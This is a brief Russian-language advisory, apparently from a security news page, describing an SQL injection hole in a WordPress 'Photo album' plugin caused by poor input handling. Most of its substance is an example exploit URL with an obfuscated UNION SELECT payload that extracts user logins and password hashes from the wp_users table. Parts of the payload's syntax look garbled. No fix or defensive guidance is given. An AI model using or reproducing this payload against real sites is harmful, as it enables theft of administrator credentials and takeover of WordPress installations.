Программа: WordPress Photo album

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://xxxxxxxx/?page_id=13&album= [exploit]

[exploit]

S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2F select/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/* */from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201



Оставить мнение